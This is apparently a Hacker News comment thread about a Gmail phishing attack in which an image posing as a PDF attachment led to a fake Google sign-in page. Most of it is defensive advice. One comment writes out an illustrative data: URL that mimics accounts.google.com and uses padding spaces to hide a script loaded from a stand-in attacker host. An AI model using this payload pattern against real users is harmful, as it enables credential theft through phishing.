It does point out a major problem. Email used to be text only. Then we added attachments that needed to be saved as a file and read with whatever app. Then we went to automatically displaying attached images and having live HTML links. All of these things we do for convenience make this sort of attack more possible.

reply

[–] suprjami link

The closest I ever came was a Nigerian scam where a crown prince had been one of the first people on a space station in the 90s, but his return seat was taken up by cargo when they decommissioned the satellite, so they just left him in orbit.

After 15 years alone in space he was "in good spirits" but wanted to come home and would share his overtime flight pay of $15M with me.

Seriously where do they find these stories.

reply

[–] greggman link

I actually did get phished by this. I think I just got lucky that I had 2FA on and they didn't phish that too.

http://blog.greggman.com/blog/getting-phished/

The worst thing is I don't know how to help my less technical friends not fall for it. They are unlikely to use 2FA, I think.

reply

[–] sundvor link

Hm, a giveaway would be that the image would most likely not be interactive like the real thing is now for me (Chromium). I.e. a PDF attachment footer "icon" renders the preview, and then action buttons when hovering the mouse over it. The buttons then change to darker colours with alt text when hovering over them again.

Or did they manage to embed the JS to simulate these actions with the attack?

reply

[–] chinathrow link

The 2FA token is valid for up to 1 minute and the attacker could easily ask for it as well...

There were no image downloads, it was embedded within the message itself.

reply

[–] Dangeranger link

OK, that's valid. Other than blocking bit.ly and other commercial link-sharing services, this seems to be a human-hacking problem. It's hard to get people to be careful about checking the URL on a login page.

reply

[–] Dangeranger link

Use 2-factor auth. If you are a sysadmin, make it required. Block image downloads by default. Turn on login notifications for unknown devices. If you are a sysadmin in a controlled network and serve content via proxy, block bit.ly. This is a clever and dangerous attack, but it can still be avoided by following the above.

reply

[–] elchief link

A reminder that U2F essentially prevents phishing attacks:

http://security.stackexchange.com/questions/71316/how-secure...

reply

[–] jsz link

I've seen this before and nearly fell for it myself. If I didn't have autofill for Google account logins I would definitely have fallen for this. I noticed immediately when it made me type in my email and password and had no record of my other accounts.

reply

[–] bitskits link

Some further reading on the subject by lcamtuf (from 2011): https://lcamtuf.blogspot.com/2011/12/old-switcharoo.html

reply

[–] CGamesPlay link

One of my users was hit by this recently. Another interesting tactic they used was a redirect to the fraudulent login page. This way, as soon as it was reported as phishing to Google, they just incremented a number in the URL and could continue harvesting.

reply

[–] bad_user link

EV certificates don't work. You're relying on the user to spot a change in the address bar, which is no different than relying on the user to notice that the domain is not "gmail.com".

HTTPS is meant for preventing MITM attacks, but it isn't meant to validate the identity of the entity you're speaking to; even though some people try doing that, it's just a game of pretend.

reply

[–] MrManatee link

I totally agree that EV certificates don't work. I know the difference between EV and DV, but I'm glad I don't have to rely on that knowledge very much. I don't trust myself to notice if an EV site suddenly had a slightly different-looking DV-style lock icon. I don't even trust myself to remember which sites use EV in the first place.

Like many other commenters here, I mostly rely on password autocompletion. If autocompletion doesn't recognize the site, then I'm extra careful. The point is that this is rare enough that it is actually feasible for me to be careful on those occasions.

reply

[–] andygambles link

It is a much more visible change than a URL that could be spoofed or malformed.

reply

[–] sowpati link

I'm not an expert, but as I understand it, they don't actually use password fields on phishing pages. Instead they use normal text fields and fake password dots. So I'm not sure they can be identified as login pages.

ETA: another parent comment talks about the same thing.

reply

[–] andygambles link

In general they should use EV site-wide rather than just on login pages, to help confirm it is the correct, legitimate website.

reply

[–] andygambles link

The aim of EV certificates is to reduce such risks and highlight to the user the legitimacy of such websites.

HTTPS alone only provides encryption. Google doesn't use EV anywhere, but I feel it should on login pages especially, given they are a high-value phishing target.

reply

[–] wnevets link

If Google still disabled images by default, this would have been defeated.

reply

[–] TimWolla link

They already do this: on a known computer (logged in at least once) your Google+ photo and name are shown.

see: https://i.imgur.com/96uZRPC.png

reply

[–] btown link

So then they use a botnet to input your username on google.com to get your image, then stream it to you.

reply

[–] undefined link
[deleted]

reply

[–] safe001 link

How about 3-step auth?

1. You input your username. Google sends back a message/picture which you saved with Google at your last login; you confirm, then go to step 2.

2. You input your password.

3. Google asks you to input an auth code.

reply

[–] et-al link

Part of why we're impressed (and dismayed) is that they use a data URL to look like "accounts.google.com" and to load a remote script out of sight to the right of all the spaces. Maybe the URL protocol didn't fool you, but I think there are a good number of users out there who have been "trained" to check the URL to see that it says "accounts.google.com" and think it's fine.

And while clicking on an attachment shouldn't sign out a user, being automatically signed out has happened enough to most people that it seems like a fairly innocuous event, especially since this is supposed to be an attachment, not a link, and you just need to sign back in. So one does.
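
For anyone who hasn't seen it, the address bar contents had roughly this shape (attacker domain invented here for illustration). It's all one line, with the script tag pushed out of view by the run of spaces:

    data:text/html,https://accounts.google.com/ServiceLogin  [hundreds of spaces]  <script src="https://attacker.example/login.js"></script>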

reply

[–] Ajedi32 link

So how is this any different from using a URL like `accounts.google.com.googlelogin.cz` instead? I mean, yes obviously using a `data:` URL is certainly creative, but is it really any more effective?

reply

[–] shadowlord link

Yes, getting automatically signed out is a normal thing. And of course, the user wouldn't suspect that it was the attachment that caused that. So yes, I see it now how this is a legitimate concern.

reply

[–] skykooler link

An attachment could take you to a login page if your Google account was logged out after you loaded Gmail. I've actually had this happen when I suspended my laptop (with a gmail tab open), got on a plane, and opened it again when I got off. When I tried to do something in Gmail again I was logged out (and when I logged in again I got the email from Google "Was this you?")

reply

[–] shadowlord link

Yes I agree, in the situation you described, this becomes a legitimate threat. Thanks for pointing that one out.

reply

[–] shadowlord link

Correct me if I'm wrong, but that embedded image (pretending to be an attachment) redirects you to a (fake) Gmail login page. How is that supposed to trick anyone? I mean, isn't it unusual (i.e. it never happens) for attachments to take you to a Gmail login page? That's suspicious behaviour right there. How is it a serious phishing attack that's getting so much attention on a platform like HN, where people are used to much more sophisticated hacks? Unless you're implying that visiting that website (the fake login page) itself could harm the user's device, is there some detail that I'm missing here?

reply

[–] Neil44 link

One of my clients got hit with this yesterday. Google suspended the account but only after a round of emails had gone out.

Seems like at this point the perps are just harvesting credentials.

reply

[–] wopwopwop link

This guy has an interesting YouTube channel

https://www.youtube.com/user/enyay

reply

[–] jim-jim-jim link

I started using mutt to avoid image tracking, but dodging clever stuff like this is an added bonus.

I probably would have fallen for this.

reply

[–] contravariant link

If you accept that someone is allowed to embed text documents into a URL then you also need to either allow people to link to text documents containing large runs of white space, or introduce some very weird restrictions to the kind of documents that can be embedded that way.

reply

[–] lucideer link

"legitimate" is highly subjective in this instance. Personally, I would argue that there's none. The only use case I can think of is submitting a form with arbitrary text in a field value, but most such submits should be POSTed. The main exception - search keywords - are a lot less likely to need to support repeating whitespace.

However, a better question is: do a lot of legitimate websites in the wild put multiple spaces in the address field. Obvious answer is that millions do, so there's nothing browsers can really do here.

reply

[–] cdubzzz link

Just addressing this attack in particular, is there any legitimate reason to have consecutive white spaces in a URL bar?
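
The check itself would be trivial; a quick sketch (hypothetical, no browser ships this heuristic as far as I know):

    import re

    def suspicious_address(url):
        # Flag any run of two or more raw whitespace characters -- the
        # padding trick needs hundreds of them to push content out of view.
        return re.search(r"\s{2,}", url) is not None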

reply

[–] codedokode link

This could be prevented by using physical keys instead of passwords. People are weak at deciphering URL bar contents.

reply

[–] rocqua link

Cool to see Tom Scott on hackernews.

reply

[–] lanius link

Wow. Imagine if they had just used a few hundred extra spaces.

reply

[–] ravenstine link

This is why I disable images by default in my email client.

reply

[–] mxuribe link

Pretty. Damned. Clever. ...And, scary too.

reply

[–] witty_username link

A Chromebook won't help any more than Chrome for phishing.

reply

[–] whyagaindavid link

Serious question: does having a Chromebook help anyway? How often is Google Safe Browsing checked?

Wondering if I should do all my internet activity on the Chromebook only.

reply

[–] Kiro link

This doesn't tell the whole story though. You should read the comments and see the subsequent images.

reply

[–] junto link

Thanks for posting the image. Twitter's mobile site does not allow you to zoom the image. Very annoying how mobile sites do that.

reply

[–] JorgeGT link

The most important image IMHO is the following, be sure to check it: https://pbs.twimg.com/media/C0XB_c8WIAAtEF8.jpg:large

reply

[–] yread link

To save the click:

Tom Scott (@tomscott):

This is the closest I've ever come to falling for a Gmail phishing attack. If it hadn't been for my high-DPI screen making the image fuzzy… https://pbs.twimg.com/media/C0W-dCCWQAAl0cn.jpg

reply

[–] lovich link

I don't know of a mirror, but the email had an embedded image that looked like a PDF attachment in Gmail. The embedded image led to a fake Google sign-in page when clicked.

reply

[–] farresito link

"This is the closest I've ever come to falling for a Gmail phishing attack. If it hadn't been for my high-DPI screen making the image fuzzy..."

https://pbs.twimg.com/media/C0W-dCCWQAAl0cn.jpg

If you can't view the image, try this:

http://imgur.com/oJYWPXE

reply

[–] retube link

Twitter blocked in my location. Is there a mirror?

Edit: thanks all for help below. Yes very cunning.

reply

[–] ivrrimum link

Pretty smart idea.

reply

[–] igorigor link

Why doesn't Google, with all its brains and money, proactively write code to defend against this kind of shite?

reply

[–] mderazon link

Don't trust HTTPS; any malicious site can get a certificate very easily. I once almost fell for a smart Airbnb phishing attack. At some point, I was directed to https://www.airbnb.com.eubook.net/en/instant/rooms/2685603?c... to complete my booking. The website had a perfectly valid SSL cert (it doesn't anymore) and, more importantly, check out the domain name! I almost missed the .eubook.net part!

reply

[–] JorgeGT link

HTTPS only means "you are securely accessing this particular domain" not "the operators of this domain are nice people".

reply

[–] rvern link

That's why witty_username said to check the domain name and for HTTPS, not just for HTTPS.

reply

[–] abecedarius link

My policy is to enter it myself, maybe with help from address bar autocomplete or Google. Perhaps I should make my own portal page instead.

(The exception is some sites like Amazon that prompt for a password on certain actions. I wonder if I should worry about something weird happening like a tab left alone a long time impersonating Amazon when I get back to it.)

reply

[–] witty_username link

To stop being phished, always check the domain name and for HTTPS before entering passwords.

reply

[–] pvdebbe link

Luckily I always pay attention to the URL, and I consider myself pretty safe from all sorts of phishing attacks. There have been quite a few clever ones.

reply